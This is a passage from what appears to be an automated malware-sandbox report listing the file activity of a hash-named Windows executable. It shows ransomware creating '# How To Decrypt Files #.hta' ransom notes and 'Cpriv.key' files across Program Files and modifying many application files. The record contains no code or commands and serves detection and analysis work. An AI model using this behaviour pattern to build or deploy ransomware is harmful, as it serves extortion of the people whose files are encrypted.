Files\Java\jre7\lib\security\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0199549.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImages256Colors.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL002.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\COMPASS\COMPASS.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.clusters de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\javafx.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153089.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEBPAGE.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_snow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\MSMAPI\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD06102_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0216724.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Installed_resources14.xss de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_sun.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Triedit\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Esl\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\localizedStrings.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-changjei.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00261_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185800.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\ONENOTE.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\ContentDirectory.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\14.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\ink\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00273_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14795_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Bibliography\Sort\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-options.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Aspect.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Blog.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows NT\TableTextService\TableTextServiceSimplifiedZhengMa.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18223_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18248_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Solstice.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSPUB.DEV_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\button-highlight.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Metro.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR48B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\ALERT.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\triangle.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUECALM\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Grid.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21535_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Installer\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-mx.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME11.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\validation.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Synchronization Services\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceDaYi.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\SpeechEngines\Microsoft\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\settings.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\ja.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR9F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_justify.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099174.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\accessibility.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENFR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\NavigationButtonSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPrintTemplateRTL.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157191.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02253_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\CONCRETE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00199_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-tw.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01066_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00208_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21311_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)greenStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\VIEW.JS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\UrbanMergeLetter.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\CLIPART\PUB60COR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04355_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\MSTHED98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Connectivity.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\1.0 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureA.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01169_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0297185.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUEPRNT\BLUEPRNT.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\EXCEL_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR31F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WhiteboxMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_VideoInset.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-ui.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107712.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02386_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00629_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0299611.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14980_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\OrielReport.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\AD98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\omni.ja de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0222015.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-ui.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft 